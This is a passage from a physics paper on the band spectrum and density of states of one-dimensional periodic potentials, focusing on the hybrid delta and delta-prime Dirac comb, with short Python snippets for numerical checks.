The paper is organised as follows. In Section~\ref{sec_review} we review and generalise some basic results about the band structure of one-dimensional periodic potentials built from potentials with compact support smaller than the lattice spacing. In particular, we highlight some aspects that are not easily found in the standard literature, such as the density of states. In Section~\ref{sec_1species} we present the original results we have obtained for a particularly interesting example: what we will call in the sequel the {\it one-species hybrid Dirac comb}, which corresponds to the potential \eqref{1.8} introduced before. Properties of the band spectrum and density of states are studied in detail.
In Section~\ref{sec_2species} we deal with the {\it two-species hybrid Dirac comb}, obtained by adding an extra hybrid comb to \eqref{1.8} displaced a distance $d$ with respect to the original. Finally in Section~\ref{sec_conclusions} we give our conclusions and further comments concerning our results.
\section{Review of band structure for one-dimensional periodic potentials}
\label{sec_review}
In this section we present some general formulas for one-dimensional chains with a periodic potential, built from a potential $V_C(x)$ with compact support $J_0=[-\eta/2,\eta/2]$, that vanishes outside small intervals $J_n=[na-\eta/2,na+\eta/2]$, included in $I_n=[na-a/2,na+a/2]$, centered around the chain points $na$ ($n\in {\mathbb Z}$ and $a>\eta$), whose union gives the whole real line. The dimensionless Schr\"odinger equation associated to $V_C(x)$ is:
\begin{equation}\label{2.1}
H_C \, \psi_k(x)\equiv \left(-\frac{d^2}{dx^2}+V_C(x)\right)\psi_k(x)=k^2 \psi_k(x),
\quad \varepsilon=k^2>0.
\end{equation}
The potential $V_C(x)$ is not necessarily even with respect to spatial reflections $x\to -x$. For \eqref{2.1}, we find two linearly independent scattering solutions: one going from left to right ($R$) and the other in the opposite direction ($L$).
Outside the interval $J_0$ these scattering waves have the following form:
\begin{equation}\label{2.2}
\psi_{k,R}(x)=
\left\{
\begin{array}{ll}
e^{-i k x} r_R(k)+e^{i k x}, & x<-\frac{\eta}2. \\ [2ex]
t_{R}(k) e^{i k x}, & x>\frac{\eta}2.
\end{array}
\right.
\qquad
\psi_{k,L}(x)=
\left\{
\begin{array}{ll}
t_{L} (k) e^{-i k x}, & x<-\frac{\eta}2. \\ [2ex]
e^{i k x} r_L(k)+e^{-i k x}, & x>\frac{\eta}2.
\end{array}
\right.
\end{equation}
The functions $\{r_R(k),r_L(k),t_R(k),t_L(k)\}$ represent right and left reflection and transmission scattering amplitudes. One interesting property of these coefficients is that $r_R(k)\neq r_L(k)$ if $V_C(x)\neq V_C(-x)$. On the other hand, time-reversal symmetry of the Hamiltonian we are dealing with implies $t_R(k)=t_L(k)=t(k)$. The scattering matrix
\begin{equation}\label{2.3}
S=\left(\begin{array}{cc}
t(k) & r_R(k) \\[2ex]
r_L(k) & t(k)
\end{array} \right)
\end{equation}
is unitary. Therefore its two eigenvalues have modulus equal to $1$, and their respective arguments define the scattering phase shifts $\delta_\pm(k)$ in the so-called even ($+$) and odd ($-$) channels, respectively.
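As a concrete illustration of this unitarity, consider the simplest compactly supported interaction, a single Dirac $\delta$ of strength $w_0$ in the dimensionless units of the Introduction, for which $t(k)=2ik/(2ik-w_0)$ and $r_R(k)=r_L(k)=w_0/(2ik-w_0)$. The sketch below builds $S$ and checks $SS^\dagger=\mathbb{1}$ numerically:

```python
import numpy as np

def s_matrix(k, w0):
    """S-matrix of a single Dirac delta of strength w0 (dimensionless units)."""
    t = 2j * k / (2j * k - w0)
    r = w0 / (2j * k - w0)
    return np.array([[t, r], [r, t]])

k, w0 = 1.3, 4.0
S = s_matrix(k, w0)

# Unitarity: S S^dagger must be the identity.
print(np.allclose(S @ S.conj().T, np.eye(2)))

# The eigenvalues exp(2i delta_pm) give the even/odd phase shifts.
phases = np.angle(np.linalg.eigvals(S)) / 2.0
print("delta_+/- =", phases)
```

Note that $t-r=1$ for a pure $\delta$, so the odd-channel phase shift vanishes identically: odd waves do not feel a $\delta$ potential.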
\noindent {Next, we construct the periodic potential using $V_C(x)$ as building blocks. Thus, we have a Hamiltonian of the form:
\begin{equation}\label{2.4}
H_P=-{d^2}/{ dx^2}+V_P(x), \qquad \qquad V_P(x)=\sum_{n=-\infty}^\infty V_C(x-na).
\end{equation}}
In order to obtain the eigenfunctions of $H_P$, we need to use the Floquet-Bloch pseudo-periodicity conditions:
\begin{equation}\label{2.5}
\psi_q(x+a)=e^{i q a}\psi_q(x), \qquad
\psi^\prime_q(x+a)=e^{i q a}\psi^\prime_q(x),\qquad
q\in\left[-\frac{\pi}{a},\frac{\pi}{a}\right],
\end{equation}
where, as usual, we are restricting our considerations to the first Brillouin zone.
Since for each primitive cell $I_n$ the compactly supported potential $V_C(x-na)$ vanishes outside the interval $ J_n=[n a- \eta/2,na+ \eta/2]$,
then on any of the intervals $\mathcal{J}_n\equiv\{x\in I_n\vert\, x\notin J_n \}$ the Bloch waves are linear combinations of the two scattering solutions centered at the point $n a$:
\begin{equation}\label{2.6}
\psi_{k,n,q}(x)=A_n\psi_{k,R}(x-na)+B_n\psi_{k,L}(x-na)\,, \quad{\rm for}\,\,x\in
\mathcal{J}_n\,.
\end{equation}
Then, we use the Floquet-Bloch pseudo-periodicity conditions given in equation \eqref{2.5} at the points $x=na-a/2$,
so as to obtain the following two linear equations for the coefficients { $A_n$ and $B_n$:
\begin{equation}\label{2.9}
\left(\begin{array}{cc}
\psi_{k,R}(a/2)-e^{i q a}\psi_{k,R}(-a/2) & \psi_{k,L}(a/2)-e^{i q a}\psi_{k,L}(-a/2)\\[2ex]
\psi^\prime_{k,R}(a/2)-e^{i q a}\psi^\prime_{k,R}(-a/2) & \psi^\prime_{k,L}(a/2)-e^{i q a}\psi^\prime_{k,L}(-a/2)
\end{array}\right)\left(\begin{array}{c} A_n \\[2ex] B_n \end{array}\right)=0\,.
\end{equation} }
{Non-trivial solutions $A_n$, $B_n$ of \eqref{2.9} exist only if the determinant of the square matrix in \eqref{2.9} vanishes. Using the scattering wave eigenfunctions \eqref{2.2},
we obtain the following secular equation \cite{NIE}:}
\begin{equation}\label{2.11}
\cos(q a)=\frac{e^{i a k} \left(t(k)^2-r_L(k) r_R(k)\right)+e^{-i a k}}{2\,
t(k)}\,\equiv F(\varepsilon=k^2)
\end{equation}
Alternatively, taking into account that from the scattering matrix \eqref{2.3}
\begin{equation}\label{tracedet}
{\rm tr}(S) = 2 t(k)\qquad \text{and}\qquad \det (S)= t^2(k)-r_R(k)r_L(k),
\end{equation}
we can write the secular equation \eqref{2.11} as
{\begin{equation}\label{2.12}
{\rm tr}(S)\cos(q a)=e^{-i a k}+\det (S)e^{i a k}\,.
\end{equation}
This equation enables us to obtain the band energy spectrum as the different branches $\varepsilon= \varepsilon_n(q)$, $q\in[-\pi/a,\pi/a]$, defined implicitly by $F(\varepsilon)=\cos(qa)$, which, obviously from \eqref{2.11}, are symmetric functions of $q$: $\varepsilon_n(-q)=\varepsilon_n(q)$. } Notice that for any branch $\varepsilon_n(q)$, taking the derivative of \eqref{2.11} with respect to $q$ we have
\begin{equation}\label{2.16a}
-a \sin (q a)= \left. \frac{d F(\varepsilon)}{d\varepsilon}\right\vert_{\varepsilon_n} \frac {d\varepsilon_n}{dq }\,,
\end{equation}
and therefore, as the left hand side of \eqref{2.16a} only vanishes at $q=0,\pm\pi/a$ in the first Brillouin zone, we get the following important consequences:
\begin{itemize}
\item
The function $\varepsilon_n(q)$ is monotone on the intervals $(-\pi/a,0)$ and $(0,\pi/a)$. Otherwise it would have a critical point inside one of these intervals, with $\frac{d\varepsilon_n}{dq}=0$ making the right-hand side of \eqref{2.16a} vanish, whereas the left-hand side only vanishes at $q=0,\pm\pi/a$. The function $\varepsilon_n(q)$ has either a maximum or a minimum at $q=0,\pm \pi/a$.
\item
As a consequence of the above, the function $F(\varepsilon)$ is monotone on each band, i.e., for $\varepsilon$ ranging over every branch $\varepsilon_n(q)$.
\end{itemize}
{Since the scattering amplitudes $\{t(k),r_R(k),r_L(k)\}$ have better analytical properties in the complex plane, we can use equation \eqref{2.11} to write down the inequality that characterises the whole band spectrum} of the system in terms of either $k$ or the energy $\varepsilon=k^2$:
{\begin{equation}\label{2.17}
\left\vert \frac{e^{i a k} \left(t(k)^2-r_L(k) r_R(k)\right)+e^{-i a k}}{2
t(k)}\right\vert
= \left\vert F(\varepsilon=k^2)\right\vert \leq 1\,.
\end{equation}
As shown in \cite{KURASOVLARSON}, the eigenfunctions at the band edges are of particular importance, i.e., those Bloch waves characterised by the values of the momenta $k_i$ such that
\begin{equation}\label{2.18}
\left\vert F(\varepsilon=k_i^2)\right\vert= 1, \qquad i=0,1,2, \dots
\end{equation}}
The discrete set of momenta satisfying \eqref{2.18} gives the lowest and highest values of $k$ for each allowed band. If for some of these points, say $k_i$, we have $k_i=k_{i+1}$, there is no gap between two consecutive bands. Furthermore, this is more likely to happen for large values of $k$, where $|t(k)|$ is close to one (see Ref. \cite{KURASOVLARSON}).
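To make the band conditions \eqref{2.17}-\eqref{2.18} concrete, the following sketch locates the band edges numerically for the simplest choice of $V_C$, a single Dirac delta of strength $w_0$ (its amplitudes are the $w_1=0$ case of Section 3; the values of $a$ and $w_0$ are illustrative assumptions):

```python
import numpy as np

a, w0 = 1.0, 5.0  # lattice spacing and delta strength (illustrative assumptions)

# Scattering amplitudes for a single Dirac delta V_C(x) = w0*delta(x)
# (the w1 = 0 case of Section 3), used here to make eq. (2.11) concrete.
def t(k):  return k / (k + 0.5j*w0)
def rR(k): return -(0.5j*w0) / (k + 0.5j*w0)
rL = rR  # the delta is parity even, so r_R = r_L

def F(k):
    """Right-hand side of the secular equation (2.11); real for real k."""
    return ((np.exp(1j*a*k)*(t(k)**2 - rL(k)*rR(k)) + np.exp(-1j*a*k))
            / (2*t(k))).real

# Band edges k_i solve |F(k_i)| = 1: locate the sign changes of |F| - 1 on a grid
ks = np.linspace(1e-6, 12.0, 200001)
sgn = np.sign(np.abs(F(ks)) - 1.0)
edges = ks[:-1][sgn[:-1] != sgn[1:]]
bands = list(zip(edges[::2], edges[1::2]))   # allowed momentum bands (k_low, k_high)
print(bands)
```

For this choice, $F$ reduces analytically to the textbook Kronig-Penney form $\cos(ka)+\frac{a w_0}{2}\frac{\sin(ka)}{ka}$, which the code can be used to verify.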
There are two extreme situations. When the compact potential $V_C(x)$ is opaque, the transmission coefficient vanishes: $t(k)=0$. Under these conditions, equation \eqref{2.12} takes the form
\begin{equation}\label{2.19}
e^{-2 i k a}-r_R(k) r_L(k)=0\,.
\end{equation}
In this case the band equation becomes the secular equation of a square well with opaque edges, giving rise to a discrete energy spectrum. The other extreme situation is when the potential $V_C(x)$ is transparent: $ |t(k)|=1$. In this case, we do not have a band structure since, from { \eqref{2.11}}, the spectrum coincides with that of the free particle.
There is another possibility, namely the existence of negative energy bands, arising from the bound states of the compactly supported potential from which the lattice is built, in case they exist. These are solutions of \eqref{2.11} for imaginary momenta, i.e., $k=i\kappa$, with $\kappa>0$, so that the energy is negative: $\varepsilon=-\kappa^2<0$. The allowed energies for {these bands} satisfy the following inequality:
\begin{equation}\label{2.21}
\left\vert \frac{e^{- a \kappa} \left(t(i\kappa)^2-r_L(i\kappa) r_R(i\kappa)\right)+e^{ a \kappa}}{2
t(i\kappa)}\right\vert\leq 1\,.
\end{equation}
Thus far, we have discussed the general form of the inequalities providing energy and momentum allowed bands for the periodic potentials under our consideration. Let us see now some properties of a crucial magnitude: the density of states.
\subsection{The density of states}\label{dos21}
The density of states $g(\varepsilon)$ in Solid State Physics contains the information about the distribution of energy levels. It plays a central role in the calculation of thermodynamic quantities from the physical properties defined by the quantum mechanical problem of one particle moving in the periodic potential that defines the crystal system, especially those quantities involving averages over {occupied levels}, such as the internal energy, the thermal and electric conductivities, etc.
This function $g(\varepsilon)$ is defined {as the} number of energy eigenvalues between $\varepsilon$ and $\varepsilon+d\varepsilon$ divided by the length of the first Brillouin zone $2\pi/a$. {We may write the general expression for the density of states for a given band produced by a one-dimensional periodic potential as
\begin{equation}\label{2.22}
g_n(\varepsilon)= \frac{a}{2\pi} \int_{-\pi/a}^{\pi/a} \delta(\varepsilon-\varepsilon_n(q))\, d q =
\frac{a}{\pi} \int_{0}^{\pi/a} \delta(\varepsilon-\varepsilon_n(q))\, d q,
\end{equation}
because $\varepsilon(q)=\varepsilon(-q)$. It is noteworthy that
$\varepsilon(q)$ is multivalued and its $n$-th branch $\varepsilon_n(q)$ is the $n$-th energy band.
Equation \eqref{2.11} gives the energy as a function of the quasi-momentum $q$ for the $n$-th energy band, in terms of a function $\varepsilon_n=\varepsilon_n(q)$ for $q\in [-\pi/a,\pi/a]$.}
As already proven, the functions $\varepsilon_n(q)$ are monotone, and therefore if we make the change of variable $y_n=\varepsilon_n(q)$ we get
\begin{equation}\label{2.22b}
g_n(\varepsilon) = \frac{a}{\pi} \int_{\varepsilon_n(0)}^{\varepsilon_n(\pi/a)} \frac{dq}{d y_n}\ \delta(\varepsilon-y_n)\, d y_n=
\frac{a}{\pi} \left\vert \frac{dq}{d \varepsilon} \right\vert \int_{m_n}^{M_n} \delta(\varepsilon-y_n)\, d y_n,
\end{equation}
where $m_n= \min\{\varepsilon_n(0), \varepsilon_n(\pi/a)\}$ and $M_n= \max\{\varepsilon_n(0), \varepsilon_n(\pi/a)\}$. Then, the whole density of states will be
\begin{equation}\label{2.22c}
g(\varepsilon)=\sum_{n} g_n(\varepsilon) = \frac{a}{\pi} \left\vert \frac{dq}{d \varepsilon} \right\vert \left(\sum_{n} \int_{m_n}^{M_n} \delta(\varepsilon-y_n)\, d y_n \right).
\end{equation}
Observe that the term in parentheses in \eqref{2.22c} is one if $\varepsilon$ belongs to any allowed band and is zero otherwise. From {\eqref{2.11}}, the explicit form of the function $q(\varepsilon)$ is
\begin{equation}\label{2.26}
q(\varepsilon)=\frac{1}{a} \arccos F(\varepsilon)\,.
\end{equation}
For the values of $\varepsilon$ outside any allowed band, the absolute value of $F(\varepsilon)$ is bigger than one, and therefore $\arccos F(\varepsilon)$ acquires a constant real part ($0$ or $\pi$) and a non-vanishing imaginary part. This fact allows us to give a general expression for the density of states if we take into account that
\begin{equation}\label{2.28}
\left\vert \frac{dq}{d \varepsilon} \right\vert \left(\sum_{n} \int_{m_n}^{M_n} \delta(\varepsilon-y_n)\, d y_n \right)
=
\left\vert {\rm Re}\left(\frac{dq(\varepsilon)}{d\varepsilon}\right)\right\vert\,.
\end{equation}
Hence,
\begin{equation}\label{2.29}
g(\varepsilon)=\frac{1}{\pi} \left\vert {\rm Re} \left[\frac{d}{d\varepsilon}\arccos F(\varepsilon) \right]\right\vert,
\end{equation}
a very important result that will be used in the sequel.
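A direct numerical implementation of \eqref{2.29} is straightforward: take a finite-difference derivative of $\arccos F(\varepsilon)$ using complex arithmetic, so that the real part is automatically constant (and the density vanishes) inside the gaps. The sketch below uses the pure $\delta$-comb form of $F$ (the $w_1=0$ case of Section 3), with illustrative values of $a$ and $w_0$:

```python
import numpy as np

a, w0 = 1.0, 5.0  # illustrative Dirac-comb parameters (assumptions)

def F(eps):
    """Kronig-Penney F(eps) for a pure delta comb:
    cos(ka) + (a*w0/2) sin(ka)/(ka), with k = sqrt(eps)."""
    k = np.sqrt(np.asarray(eps, dtype=complex))
    return (np.cos(k*a) + 0.5*a*w0*np.sin(k*a)/(k*a)).real

def dos(eps, h=1e-6):
    """Eq. (2.29): g(eps) = (1/pi) |Re d/deps arccos F(eps)|,
    evaluated by central differences with complex arccos."""
    qp = np.arccos(F(eps + h).astype(complex))
    qm = np.arccos(F(eps - h).astype(complex))
    return np.abs(((qp - qm) / (2*h)).real) / np.pi

print(dos(np.array([4.0])), dos(np.array([12.25])))  # inside a band vs inside a gap
```

Inside a gap both sample points give the same constant real part of $\arccos F$, so the numerical density drops to zero without any explicit case distinction.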
{If the charge carriers are fermionic particles, the probability of occupying a state of energy $\varepsilon$ is given by the Fermi-Dirac distribution. Hence, in order to obtain the average number of fermions per unit energy and unit volume, the density of states must be multiplied by the Fermi-Dirac distribution as follows:
\begin{equation}
N(\varepsilon)= g(\varepsilon) \frac{1}{e^{(\varepsilon-\mu)/T}+1}
\end{equation}
where $\mu$ is the chemical potential. The function $\mu(T)$ is also called the Fermi level, and its value at $T=0$ is the Fermi energy. Depending on the position of the Fermi energy, the allowed zones, including the lowest one, can act as valence or as conduction bands. In addition, all the energies from the allowed zones belong to the absolutely continuous spectrum of the energy operator, and the corresponding states are delocalised.}
On the other hand, if the charge carriers are bosonic particles, the average number of particles per unit volume and energy follows Bose-Einstein statistics:
\begin{equation}
N(\varepsilon)= g(\varepsilon) \frac{1}{e^{(\varepsilon-\mu)/T}-1}.
\end{equation}
It is noteworthy that at zero temperature all bosons occupy the minimum energy state, giving rise, under special circumstances, to Bose-Einstein condensation. Recently, the system we study in this paper has been the focus of attention concerning the possibility of Bose-Einstein condensation in one-dimensional periodic systems \cite{bordagJPA2019}.
\section{The one-species hybrid Dirac comb}\label{sec_1species}
In the present section, we discuss the periodic one-dimensional system with Hamiltonian $H_P$ as defined {in} \eqref{2.4}. We use the terminology {\it one-species hybrid Dirac comb} for this model: hybrid, because it combines the Dirac delta and its first derivative; the meaning of one-species will be clarified later, when we introduce a two-species hybrid Dirac comb. Our objective is the determination and analysis of the band spectrum of $H_P$. In the previous section, we have seen that permitted and prohibited energy bands can be determined from inequalities like \eqref{2.17}, \eqref{2.18} and \eqref{2.21}, which involve the modulus of the secular equation. As previously shown, this secular equation depends on the transmission and reflection coefficients for the scattering produced by a potential of the form $V_C(x)= w_0\,\delta(x)+2w_1\,\delta'(x)$, where $w_0$ and $w_1$ were given in Section 1.2. The explicit form of these coefficients was given in \cite{GNN}:
\begin{eqnarray}\label{3.1}
&\hspace{-0.8cm} \displaystyle t(k)=\frac{(1-w_1^2)k}{(1+w_1^2)k+i w_0/2} , \quad & r_R(k)=-\frac{2 k w_1+i w_0/2}{(1+w_1^2)k+i w_0/2}, \quad
\displaystyle r_L(k)=\frac{2 k w_1-i w_0/2}{(1+w_1^2)k+i w_0/2},
\label{3.1.5}
\end{eqnarray}
Then, substitution of \eqref{3.1} into \eqref{2.11} gives
\begin{equation}\label{3.2}
{\cos( q a)= f(w_1) \left[ \cos (k a)+\frac{a}{2}w_0\ h(w_1)\,
\frac{\sin (k a)}{k a} \right]\equiv F(k;w_0,w_1)\,,}
\end{equation}
where the functions $f(w_1)$ and $h(w_1)$ are, respectively,
\begin{equation}\label{3.3}
f(w_1)=\frac{1+w_1^2}{1-w_1^2} \,,\qquad
h(w_1)= \frac{1}{1+w_1^2}\,.
\end{equation}
This result enables us to perform a detailed quantitative and qualitative study of the band spectrum and the density of states of the $\delta$-$\delta^\prime$ comb in the forthcoming subsections.
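The inequality $|F(k;w_0,w_1)|\le 1$ is easy to scan numerically. A minimal sketch (with illustrative parameter values; negative energies are handled through complex $k=\sqrt{\varepsilon}$, which turns the trigonometric functions into hyperbolic ones, as in Section 2):

```python
import numpy as np

a = 1.0  # lattice spacing (illustrative assumption)

def F(eps, w0, w1):
    """F(sqrt(eps); w0, w1) of eq. (3.2); negative eps handled via complex k."""
    k = np.sqrt(np.asarray(eps, dtype=complex))
    f = (1 + w1**2) / (1 - w1**2)
    h = 1.0 / (1 + w1**2)
    return (f * (np.cos(k*a) + 0.5*a*w0*h*np.sin(k*a)/(k*a))).real

def allowed(eps, w0, w1):
    """True where eps lies in an allowed band, i.e. |F| <= 1 (cf. eq. (3.19))."""
    return np.abs(F(eps, w0, w1)) <= 1.0

# weak attractive deltas: a negative-energy band, an allowed positive energy,
# and a forbidden energy just below k = pi
print(allowed(np.array([-0.01, 5.0, 9.5]), -0.5, 0.0))  # -> [ True  True False]
```

For $w_1=0$ the function reduces to the Kronig-Penney expression, which provides a convenient consistency check.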
\paragraph{A brief remark on the generalised Dirac comb and the $\delta'$-potential} The one-species Dirac comb in Eq. \eqref{1.8} has been previously studied in Ref. \cite{refe1}. Nevertheless, the definition used by the authors of that paper is not equivalent to the one used here. Let us go into more detail to make the difference clear, and thereby explain why different band spectra are to be expected in our case. To start with, the definition of $$\widehat K^{(1)}_{0,w_1}=-\frac{d^2}{dx^2}+w_1\delta'(x)$$ shown in Ref. \cite{refe1} is given by a certain selfadjoint extension of the operator
\begin{equation}\label{h0}
\widehat K=-\frac{d^2}{dx^2}
\end{equation}
acting on class-$(2,2)$ Sobolev functions over the space
$$\mathbb{R}^*\equiv\mathbb{R}\setminus\{0\}.$$ Specifically, the selfadjoint extension used to define the $\delta^\prime$ potential in Ref. \cite{refe1} is characterised by a domain of functions satisfying the matching conditions
\begin{equation}
\psi'(0^+)-\psi'(0^{-})=0, \,\,\psi(0^+)-\psi(0^-)=w_1\psi'(0),
\end{equation}
or equivalently,
\begin{equation}\label{dpr}
\left(
\begin{array}{c}
\psi (0^+) \\
\psi' (0^+) \\
\end{array}
\right)=\left(
\begin{array}{cc}
1 & w_1 \\
0 & 1 \\
\end{array}
\right)\cdot\left(
\begin{array}{c}
\psi (0^-) \\
\psi' (0^-) \\
\end{array}
\right).
\end{equation}
In contrast to Ref. \cite{refe1}, the Hamiltonian with a point interaction used in our manuscript
\begin{equation}
\widehat K^{(2)}=-\frac{d^2}{dx^2}+w_0\delta(x)+w_1\delta'(x)
\end{equation}
acting as well on the class-$(2,2)$ Sobolev space follows from \cite{GNN}, and is the selfadjoint extension of the operator \eqref{h0} characterised by the matching conditions
\begin{equation}
\left(
\begin{array}{c}
\psi (0^+) \\
\psi' (0^+) \\
\end{array}
\right)=\left(
\begin{array}{cc}
\alpha & 0 \\
\beta & \alpha^{-1} \\
\end{array}
\right)\cdot\left(
\begin{array}{c}
\psi (0^-) \\
\psi' (0^-) \\
\end{array}
\right),
\end{equation}
where
\begin{equation}
\alpha\equiv\frac{1+w_1}{1-w_1},\quad\beta\equiv\frac{w_0}{1-w_1^2}.
\end{equation}
It is straightforward to obtain the matching condition that characterises our definition of
\begin{equation}
\widehat K^{(2)}_{0,w_1}=-\frac{d^2}{dx^2}+w_1\delta'(x)
\end{equation}
by just making $\beta=0$:
\begin{equation}\label{dpus}
\left(
\begin{array}{c}
\psi (0^+) \\
\psi' (0^+) \\
\end{array}
\right)=\left(
\begin{array}{cc}
\alpha & 0 \\
0 & \alpha^{-1} \\
\end{array}
\right)\cdot\left(
\begin{array}{c}
\psi (0^-) \\
\psi' (0^-) \\
\end{array}
\right).
\end{equation}
Clearly, comparing Eqs. \eqref{dpr} and \eqref{dpus}, one can easily conclude that our definition of the $\delta'$ is different from the one shown in Ref. \cite{refe1}. Furthermore, the definition of the $\delta'$ used in Ref. \cite{refe1} turns out to be {\it{\bf non local}}, whereas the one we use in our paper is {\it{\bf local}}. The comparison between both possible definitions has been discussed in Refs. \cite{ALB1,SE,FAS,m2,rpmF,fronphysG}.
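The difference between the two definitions can be made quantitative at the level of the band equation. For a one-period transfer matrix $T$ with $\det T=1$ (both matching matrices above have unit determinant), the Floquet-Bloch condition reads $\cos(qa)=\tfrac12\,{\rm tr}\,T$. The sketch below composes free propagation over one cell with each matching matrix, for illustrative values of $k$, $a$ and $w_1$; the local matrix recovers \eqref{3.13}, while the non-local matrix of Ref. \cite{refe1} produces a $k$-dependent correction:

```python
import numpy as np

a, w1, k = 1.0, 0.5, 2.0  # illustrative values (assumptions)

# Free propagation over one cell in the (psi, psi') basis
c, s = np.cos(k*a), np.sin(k*a)
P = np.array([[c, s/k], [-k*s, c]])

alpha = (1 + w1) / (1 - w1)
M_local    = np.array([[alpha, 0.0], [0.0, 1/alpha]])  # matching matrix (dpus)
M_nonlocal = np.array([[1.0, w1], [0.0, 1.0]])         # matching matrix (dpr)

# For a det-1 one-period transfer matrix T, Bloch waves require cos(qa) = tr(T)/2
cosqa_local    = np.trace(P @ M_local) / 2
cosqa_nonlocal = np.trace(P @ M_nonlocal) / 2

f = (1 + w1**2) / (1 - w1**2)
print(cosqa_local, f*np.cos(k*a), cosqa_nonlocal)
```

The local case yields $\cos(qa)=f(w_1)\cos(ka)$, while the non-local one gives $\cos(qa)=\cos(ka)-\tfrac{w_1 k}{2}\sin(ka)$, so the two combs indeed have different band spectra.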
\subsection{Analysis of the secular equation}
{From the general analysis carried out in the previous section the allowed energy gaps in this particular case are characterised by the condition $|F(k,w_0,w_1)|\leq 1$ where $F(k,w_0,w_1)$ is defined in \eqref{3.2}}. The solutions $\{k_i\}$, $i=0,1,2,3...$ of \eqref{2.18} can also be characterised by the critical points of \eqref{3.2} in the sense that they are solutions of the equation
\begin{equation}\label{3.8}
\frac{d}{dk}\; \left[ \cos( k a)+\frac{a}{2}w_0\ h(w_1)\,
\frac{\sin (k a)}{k a} \right]=0\,.
\end{equation}
From \eqref{3.8}, we conclude that the limits between allowed and forbidden bands depend on the values of the parameters $w_0$ and $w_1$.
Next, we proceed to the analysis of the band distribution in terms of the pair $(w_0,w_1)$. Here, we shall focus our attention on those values of $(w_0,w_1)$ that give rise to a limiting or critical behaviour.
It is convenient to introduce a notation showing the dependence of the scattering coefficients on $w_0$ and $w_1$, as well as on $k$. In the sequel, we shall write $t(k,w_0,w_1)$, $r_R(k,w_0,w_1)$, $r_L(k,w_0,w_1)$ and $\delta(k,w_0,w_1)$, so that the dependence on the couplings is manifest. In this context, we have singled out six cases:
\begin{enumerate}
\item
{For $w_0=w_1=0$, we must have the free particle over the real line. This is indeed the case, since $|t(k,0,0)|=1$ for any value of $k$ and, consequently, there is no band spectrum, but a complete continuum spectrum $\varepsilon\in(0,\infty)$. }
\item
{The case in which no $\delta'$ interaction is present ($w_1=0$, $|w_0|<\infty$) gives rise to the standard Dirac delta one-dimensional comb \cite{kronig-prsa31}. }This implies that $f(0)=h(0)=1$, where $f(w_1)$ and $h(w_1)$ have been defined in \eqref{3.3}, and that the secular equation \eqref{3.2} takes the well known expression
\begin{equation}\label{3.14}
\cos( q a)= \cos (k a)+ \frac{a}{2}\,w_0\, \frac{\sin (k a)}{ k a}\,.
\end{equation}
The band edge points are given by the discrete solutions $k_j$ of the following transcendental equations:
\begin{equation}\label{3.15}
\sqrt{\frac{4 k_j^2+w_0^2}{4 k_j^2}}\;\cos\left[k_ja+\arctan\left(\frac{2 k_j}{w_0}\right)-{\rm sg}(w_0)\frac{\pi}{2}\right]=\pm 1\,.
\end{equation}
Thus, we recover in this limiting case all the well known expressions for the Dirac comb.
\item
If $w_0=0$ with $w_1$ arbitrary but finite, there are no $\delta$-potentials and only $\delta'$-potentials in the comb. For a pure $\delta^\prime$-potential all scattering amplitudes are independent of the energy. In fact,
\begin{equation}\label{3.11}
t(k,0,w_1)=\frac{1-w_1^2}{1+w_1^2}\,, \quad r_R(k,0,w_1)=-\frac{2 w_1}{1+w_1^2} \,,\quad r_L(k,0,w_1)=\frac{2 w_1}{1+w_1^2}\,.
\end{equation}
Moreover, the total phase shift vanishes: $\delta(k,0,w_1)=0$. Hence the secular equation \eqref{3.2} simplifies to
\begin{equation}\label{3.13}
\cos( q a)=\frac{1+w_1^2}{ 1-w_1^2}\, \cos (k a)\,.
\end{equation}
\item
When $w_0$ is arbitrary, although finite, and $w_1=\pm 1$, the transmission coefficient vanishes, $t(k,w_0,\pm 1)=0$ and\footnote{It is of note that the critical values $w_1=\pm1$ occur when the parameter $\lambda$ in \eqref{1.7} satisfies $|\lambda|= \hbar^2/m=7.62\, {\rm eV}\si{\angstrom}^2$ for the electron. }
\begin{equation}\label{3.10}
r_R(k,w_0,-1)=r_L(k,w_0,1)=\frac{4 k-i w_0}{4 k + i w_0}\,, \qquad r_R(k,w_0,1)=r_L(k,w_0,-1)=-1\,,
\end{equation}
therefore the potential is opaque at each node. Consequently, as was shown in Ref. \cite{JMG}, when $w_1=+1$ the left edge ($x\to n a^-$) behaves {as a boundary with Dirichlet condition and the right edge ($x\to n a^+$) behaves as a boundary with Robin conditions}, and the opposite for $w_1=-1$. Hence, in the limit $w_1\to\pm 1$ the comb becomes an infinite collection {of boxes with length $a$ and} opaque walls where Dirichlet/Robin boundary conditions are satisfied in each side of the box. In this situation solutions to \eqref{3.2} are given by the discrete set $\{k_n\}$ satisfying the following transcendental equation
\begin{equation}\label{3.9}
\frac{\tan(k_n a)}{k_n a}=-\frac{4}{w_0 a}\,.
\end{equation}
\item
Let us consider the limiting cases where $w_0=\pm\infty$ and $w_1$ is finite. In these cases, the transmission amplitude vanishes for all $k$, i.e., $|t(k,\pm\infty,w_1)|=0 $. There are solutions to the secular equation \eqref{3.2} only if $k_n=\frac{\pi}{a}n$, where $n$ is a positive integer. Hence the spectrum is purely discrete, because all the allowed bands collapse to a point {($\varepsilon_n(q)$ becomes a flat line)}. The reflection amplitudes are constant, $r_R(k,\pm\infty,w_1)= r_L(k,\pm\infty,w_1)=-1$. Note that for a given integer $n$, there is an infinite number of eigenfunctions with energy $\varepsilon_n=k_n^2$, since the system becomes an infinite array of identical boxes with opaque Dirichlet walls.
\item
When $w_1=\pm\infty$, the scattering data \eqref{3.1}-\eqref{3.1.5} give $t(k)=-1$ and $r_R(k)=r_L(k)=\delta(k)=0$. Therefore, in this situation we recover the free particle continuum spectrum.
\end{enumerate}
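For the opaque case $w_1=\pm1$ (case 4 above), the spectrum is obtained from the transcendental equation \eqref{3.9}. A simple bisection sketch (pure Python, with an illustrative $w_0>0$) locates the first few roots; as $w_0\to\pm\infty$ they approach $k_n=n\pi/a$, consistently with case 5:

```python
import math

a, w0 = 1.0, 6.0  # illustrative values (assumptions)

def g(k):
    """Eq. (3.9) rearranged as a root-finding problem: tan(ka)/(ka) + 4/(w0 a) = 0."""
    return math.tan(k*a)/(k*a) + 4.0/(w0*a)

def bisect(lo, hi, tol=1e-12):
    # g is strictly increasing on each branch of tan, so plain bisection suffices
    while hi - lo > tol:
        mid = 0.5*(lo + hi)
        if g(lo)*g(mid) <= 0.0:
            hi = mid
        else:
            lo = mid
    return 0.5*(lo + hi)

# For w0 > 0 the roots lie where tan(ka) < 0, i.e. ka in (n pi - pi/2, n pi)
roots = [bisect(n*math.pi - math.pi/2 + 1e-9, n*math.pi - 1e-9) for n in (1, 2, 3)]
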